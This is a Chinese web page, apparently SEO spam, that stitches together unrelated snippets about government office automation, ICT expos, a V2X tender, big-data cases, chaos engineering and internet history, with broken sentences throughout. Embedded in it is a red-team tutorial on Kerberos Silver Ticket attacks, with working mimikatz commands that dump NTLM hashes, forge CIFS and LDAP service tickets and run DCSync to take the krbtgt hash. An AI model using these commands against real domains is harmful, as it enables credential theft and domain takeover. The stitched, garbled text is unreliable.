温岭市政府机关oa：市辖区政府机关oa中白银票据（Silver Ticket）攻击

温岭市政府机关oa：市辖区政府机关oa中白银票据（silver ticket）攻击效、智能的办公系统来提升工作效率、促进团队协作，并实现更好的信息管理。智慧办公系统（office automation，olden ticket 在利用过程中需要由 kdc 颁发 tgt，并且在生成伪造的 tgt 的 20分钟内，tgs 不会对该 tgt 的真伪进行校验。 silver ticket（白银票据）依赖于服务账号的密码散列值，这不同于 golden ticket 利用需要使用 krbtgt 账号的密码哈希值，因此更加隐蔽。 golden ticket 使用 krbtgt 账号密码的哈希值，利用伪造高权限的 tgt 向 kdc 要求颁发拥有任意


2018上海信息通信技术展:

2018第20届中国国际工业博览会-信息与通信技术应用展 时间：2018年9月19-23日 地点：国家会展中心（上海）主办：国家发改委、商务部、工信部、科技部、中科院、中国工程院、中国贸促会、上海市人民政府 20年来，信息与通信技术应用展以助推国际战略性新兴产业之新一代信息技术产业为己任，以市场需求为导向，政府支持为依托，媒体资源为支撑，为来自全球的ict企业构建与中国市场，与政府部门有效的沟通桥梁。 同时，icts将关注创新话题，重点聚焦“工业互联网”与“人工智能”，并特设专题展区，通过展览展示，会议论坛，互动沙龙等活动形式，与供需企业，政府主管部门，专家学者，行业机构等一起，共同体验信息带信息技术推动各应用行业与企业进行创新 展览展示覆盖ict全行业展示专区，辐射全球ict新兴市场，形式多样的现场体验活动 市场推广定制化多元化市场推广方案，最佳化参展宣传效果 演讲与会与政府嘉宾交流信息产业，与专家讨论行业前沿技术，与ict领军企业共享行业创新思维 展示内容：工业互联网，云计算与大数据，通信与网络，安防及信息安全，人工智能，物联网，智慧城市，创业创新等 观众领域:政府及行业协会、装备制造、物流及交通运输、汽车制造、船舶制造、建筑工程信息技术通信服务

dnspod十问黑湖智造：让工厂数字化如搭积木一样简单:

问答时间：2021年5月20日 嘉宾简介：刘崇明，现任黑湖科技副总裁。ict行业经历15年，曾任华为技术有限公司国家经理、公共关系与政府事务部高级总监等职务。 对工业互联网相关技术、行业生态及政府政策有深刻理解。擅长在政府政策框架下制订工业互联网企业生态战略、推动生态合作和业务落地。 mes系统软件多如牛毛，可以说下你们能这么快将产品推向市场，获得b端客户青睐的最核心原因是什么？如何才能将自己的优势、价值一层一层传递给企业客户的决策者，针对性地去解决客户的需求？ 2 吴洪声：你们曾用了两年半的时间打磨产品，直到2019年黑湖智造才开始从一家技术型公司完成向商业型公司的转型。 同时相比于垂类saas软件，通用saas软件被市场更加看好，营收和毛利要更高，你们当时是如何定位做mes系统的？未来有打算向通用型saas软件扩展吗？

1.09 亿元、襄阳市车联网先导区建设项目：天安智联、襄阳市交通规划设计院、腾讯云、汉江城建（联合体）中标:

2021年8月4日，襄阳市车联网先导区建设项目一期招标公告发布，合同估算价108670400.00元。 主要建设内容包括交叉路口基础施工，购置安装路侧通信单元、高清摄像机、毫米波雷达、激光雷达、智能信号采集器、通信网络设备、调度展示中心、车载终端等，租用公有云、网络流量服务，建设开发后台支撑运营平台等。 、部署建设等以满足 v2x 应用场景建设，建设城市级智能网联功能应用平台，以满足用户、企业、政府等交通和出行需求，并持续扩展；建设智能网联基础数据平台，包含:智能网联标识解析和网络信任支撑平台、智能网联基础平台和智能网联安全平台 中标结果 2021年8月30日评标结果公示发布，江苏天安智联科技股份有限公司（牵头单位），襄阳市交通规划设计院有限公司、腾讯云计算（北京）有限责任公司、汉江城建集团有限公司（成员单位）108557100.00 元中标。

2017最新总结政府大数据应用案例及启示:

这主要包括两个方面：○ 一是政府所拥有和管理的数据，如典型的公安、交通、医疗、卫生、就业、社保、地理、文化、教育、科技、环境、金融、统计、气象等数据；○ 二是政府工作开展产生、采集以及因管理服务需求而采集的外部大数据 2、规划部门○ 运营商大数据助力城市规划重庆市綦江区规划局委托上海复旦规划建筑设计研究院及重庆移动共同开展，利用重庆移动相关数据及綦江相关统计年鉴数据对綦江中心城区人口、住宅、商业、公共服务配套等进行大数据分析 “缓解交通堵塞”是城市大脑的首个尝试，并已在萧山区市心路投入使用，部分路段车辆通行速度提升了11％。 8、文化旅游部门○ 山东省用旅游大数据带动农村经济发展 山东省将省内公安系统、交通系统、统计系统、环保系统、通讯系统等十余个涉旅行业部门联合，整合全省旅游行业的要素数据，开发完成旅游产业运行监测管理服务平台 建设统一的政府数据开放平台，整合所有的政府公开数据，将之以统一的数据标准与数据格式进行发布，并为开发者提供api接口，可以大大提升公众对政府数据的使用效率。

温岭市政府机关oa：市辖区政府机关oa中白银票据（silver ticket）攻击

要工具。本文将探讨智慧办公系统的定义、优势以及如何选择最适合企业需求的政务OA系统。一、智慧办公系统的定义智慧办公系统是一种集成了办公自动化、信息化技术的综合性管理系统。它通过将各种办公公文系统程自动化，实现信息的集中管理和共享，提高工作效率，减少重复劳动，降低沟通成本。智慧办公系统通常包括但不限于以下功能模块：电子邮件、日程安排、文档管理、流程审批、项目管理、考勤管理等。二、智慧办公系统的优势提升工作效率：智慧办公系统通过自动化流程、集中管理信息等功能，大大减少了员工在繁琐办公事务上的时间和精力消耗，从而提高了工作效率。员工可以更专注于核心业务，提升工作质量和效率。促进团队协作：智慧办公系统提供了即时通讯、协同编辑、共享文档等功能，方便团队成员之间的沟通和协作。无论是跨部门合作还是远程办公，团队大家好，这里是 渗透攻击红队 的第 38 篇文章，本公众号会记录一些我学习红队攻击的复现笔记（由浅到深），不出意外每天一更 白银票据 silver ticket（白银票据）不同与 golden ticket。silver ticket 的利用过程是伪造 tgs，通过已知的授权服务密码生成一张可以访问该服务的 tgt。因为在票据生成过程中不需要使用 kdc，所以可以绕过域控制器，很少留下日志，而 golden ticket 在利用过程中需要由 kdc 颁发 tgt，并且在生成伪造的 tgt 的 20分钟内，tgs 不会对该 tgt 的真伪进行校验。 silver ticket（白银票据）依赖于服务账号的密码散列值，这不同于 golden ticket 利用需要使用 krbtgt 账号的密码哈希值，因此更加隐蔽。 golden ticket 使用 krbtgt 账号密码的哈希值，利用伪造高权限的 tgt 向 kdc 要求颁发拥有任意服务访问权限的票据，从而获取域控制器权限。 而 silver ticket（白银票据）会通过相应的服务账号来伪造 tgs，例如：ldap、mssql、winrm、dns、cifs 等，范围有限，只能获取对应服务权限。 golden ticket 是由 krbtgt 账号加密的，而 silver ticket（白银票据）是由特定服务账号加密的。 白银票据攻击 环境 攻击者在使用 silver ticket（白银票据）对内网进行攻击时，需要掌握下面的信息： 域名 域 sid（就是域成员sid值去掉最后的） 目标服务器的 fqdn 可利用的服务 服务账号的 ntlm hash 需要伪造的用户名 白银票据伪造 cifs 服务权限 cifs 服务通常用于 windows 主机之间的文件共享。 在当前域用户 mary 查询域控制器的共享目录的访问权限，发现没有权限： 代码语言：javascript 复制 dir \owa2010cn-godc$ 在域控制器中使用 mimikatz 获取服务账号的 ntlm hash： 代码语言：javascript 复制 mimikatz log "privilege::debug" "sekurlsa::logonpasswords" 得到的域控制器的信息： 代码语言：javascript 复制 username : administrator ntlm hash：78c403b6e04402158d26c5581f9e954b sid:s-1-5-21-1218902331-2157346161-1782232778 在命令行环境下清空当前系统中的票据，防止其他票据对实验环境进行干扰： 代码语言：javascript 复制 klist purge 或者可以使用 mimikatz 清除票据： 代码语言：javascript 复制 kerberos::purge 查看域的 sid 值： 代码语言：javascript 复制 whoami /user 得到的 sid ：s-1-5-21-1218902331-2157346161-1782232778 之后就可以使用 mimikatz 生成伪造的 silver ticket 票据：（在不能访问域控制器的mary机器上执行） 代码语言：javascript 复制 kerberos::golden /domain:<域名> /sid:<域 sid> /target:<目标服务器主机名> /service:<服务类型> /rc4:<ntlmhash> /user:<伪造的用户名> /ptt kerberos::golden /domain:god.org /sid:s-1-5-21-1218902331-2157346161-1782232778 /target:owa2010cn-god.god.org /rc4:78c403b6e04402158d26c5581f9e954b /service:cifs /user:saul666 /ptt 这个时候就能访问到域控的共享目录了： 代码语言：javascript 复制 dir \owa2010cn-godc$ 白银票据伪造 ldap 服务权限 使用 dcsync 从域控制器中获取指定用户的账号和密码哈希值，例如 krbtgt。 输入命令查看当前权限是否可以使用 dcsync 与与控制器进行同步： 代码语言：javascript 复制 # 命令格式 lsadump::dcsync /dc:域dc /domain:域名 /user:域用户名 # 示例 lsadump::dcsync /dc:owa2010cn-god.god.org /domain:god.org /user:krbtgt 向域控制器获取 krbtgt 的密码哈希值失败，说明当前权限不能进行 dcsync 操作。 输入命令在域控制器中使用 mimikatz 获取服务账号的 ntlm hash： 代码语言：javascript 复制 mimikatz log "privilege::debug" "sekurlsa::logonpasswords" 获取到的： 代码语言：javascript 复制 username : owa2010cn-god$ ntlm : 78c403b6e04402158d26c5581f9e954b 然后为了防止其他票据对实验进行干扰，我们先清除内存中的票据： 代码语言：javascript 复制 klist purge 使用 mimikatz 生成伪造的 silver ticket，在之前不能使用 dcsync 从域控制器获取 krbtgt 密码哈希值的机器中输入命令：（域 mary 机器） 代码语言：javascript 复制 kerberos::golden /domain:god.org /sid:s-1-5-21-1218902331-2157346161-1782232778 /target:owa2010cn-god.god.org /service:ldap /rc4:78c403b6e04402158d26c5581f9e954b /user:saul666 /ptt 这个时候输入命令，使用 dcsync 在域控制器中查询 krbtgt 的密码哈希值： 代码语言：javascript 复制 lsadump::dcsync /dc:owa2010cn-god.god.org /domain:god.org /user:krbtgt silver ticket 还可以用于伪造其他服务，例如以下： 参考文章： https://blog.csdn.net/weixin_45728976/article/details/105290034

混沌工程：通过试错的方法来提升稳定性:

什么是混沌工程？起源：netflix 和 chaos monkey2008 年 netflix 在整体微服务化和数据中心迁移至 aws 云的背景下，开始了在生产环境进行系统弹性的测试。 它由一系列捣乱工具构成，其中的成员可用于随机关闭实例、服务调用中引入长时间延迟、模拟整个区域的断电场景等。并且通过与持续发布平台集成，自动进行线上演练。? 避免非故障场景下预案功能正常，故障场景下却失效了 数据中心断网演练 验证数据中心的多活容灾，在无需人工干预的情况下，服务能自动在不同集群间进行可用区的平滑迁移 架构容灾评测 批量回放通用的故障场景，验证极端情况下个体组件的故障不会影响整个系统 混沌工程的核心是通过引入一些风险变量去暴露已有问题，而不是创造问题和事故。在恰当的时间和可控的爆炸半径下进行实验，有助于问题的发现和处理，降低潜在故障带来的影响。 cpu、io高 线下仿真：复制生产流量 服务应用指标（如 接口错误率） 自动：故障注入 高级 服务延迟、异常 线上生产环境 业务指标（如订单量） 自动：ci 持续集成，持续验证 故障注入稳态监控和兜底停止产出结果报告

两会闭幕！制造、交通、安全，这是「城市数字化」的10份提案:

第二，以专精特新企业为依托，探索数字科技与工业制造知识融合推动数智化的新路径；内容包括工业互联网产业集聚区优先探索设立专项资金，以政府购买服务、制定推荐目录等方式，为辖区内的专精特新企业精准诊断数智化需求 要利用物联网、云计算、人工智能等技术手段，建立覆盖所有老人、养老院、养老照料中心、养老驿站和医疗卫生机构互联互通的智慧养老服务平台。二是拓展养老服务受益面和提高养老服务补贴标准。 大幅提高政府购买居家养老服务标准，探索长护险与养老服务的结合，依托智能养老平台建设，撬动社会力量参与居家养老服务。将60岁以上老人纳入补贴范畴，享受居家养老服务。 建立与财政收入相匹配的养老保障支出的可持续增长机制。三是引进与培育专业养老服务机构和人才。通威集团刘汉元：智能电网“碳中和将是未来最大的市场机遇。” 除运行时间以外，电动汽车大部分时间在线，能成为电网储能、微网储能、小区储能、家用储能的一部分。电网负荷高时，电动汽车向电网反向售电；负荷低时，存储电网过剩电量。

internet与中国:

由于当时中国尚未正式连入internet，所以委托德国卡尔斯鲁厄大学运行cn域名服务器1993年3月2日中国科学院高能物理研究所租用at&t公司的国际卫星信道接入美国斯坦福线性加速器中心（slac）的64k 尽管如此，这条专线仍是我国部分连入internet的第一根专线中国互联网连接世界1885年中国台湾建省，首任巡抚刘铭传派人与福州船政联系，使用船政电报学堂毕业生为技术人员，于1887年铺设成功中国台湾淡水至福州川石海底电缆 此电缆毁于第二次世界大战我国于1989年开始投入到全球海底光缆的投资与建设中来，并于1993年实现了首条国际海底光缆的登陆（中日之间c-j海底光缆系统）；随后在1997年，我国参与建设的全球海底光缆系统 1998年6月18日刘强东在中关村创办京东公司，代理销售光磁产品1998年11月马化腾和张志东成立深圳市腾讯计算机系统有限公司，oicq开通1998年12月新浪网成立，关键人物：王志东2000年1月李彦宏创建了百度 2003年5月阿里巴巴集团在创立淘宝网2003年10月淘宝网首次推出支付宝服务2004年1月京东多媒体网正式开通，启用域名www.jdlaser.com2010年4月雷军创办小米2011年1月21日腾讯公司推出微信

1分钟链圈|习近平：要发展数字经济，加快推动数字产业化；v神遭强烈批评！应该考虑无限供应以太币:

，硬件钱包的销售也在增加《河北雄安新区规划纲要》全文发布 明确超前布局区块链等产业中国香港金管局召集6家银行打造区块链平台，未来将与新加坡系统连接恭喜你，今天的新闻全部看完啦。 （金色财经）9.越南总理指示加强对加密货币诈骗案件的监管越南加密货币市场目前正处于政府的关注之下，原因是在2018年4月8日，据报道，越南当地投资者被盗取了6.5亿美元的资金。 而今，俄罗斯政府却取消了禁止访问bitcoininfo.ru网站的决定。 （新华社）15.中国香港金管局召集6家银行打造区块链平台，未来将与新加坡系统连接据中国香港投资推广署金融科技主管夏多希（charles d’haussy）透露，中国香港金管局已召集6家银行，打造一个区块链平台 ，这个平台将大幅减轻银行的工作量，从而降低银行的成本，待这个区块链平台建成之后，中国香港的系统将与新加坡的系统连接。

转载请注明出处,本站网址：http://gov.515158.com/news_2319.html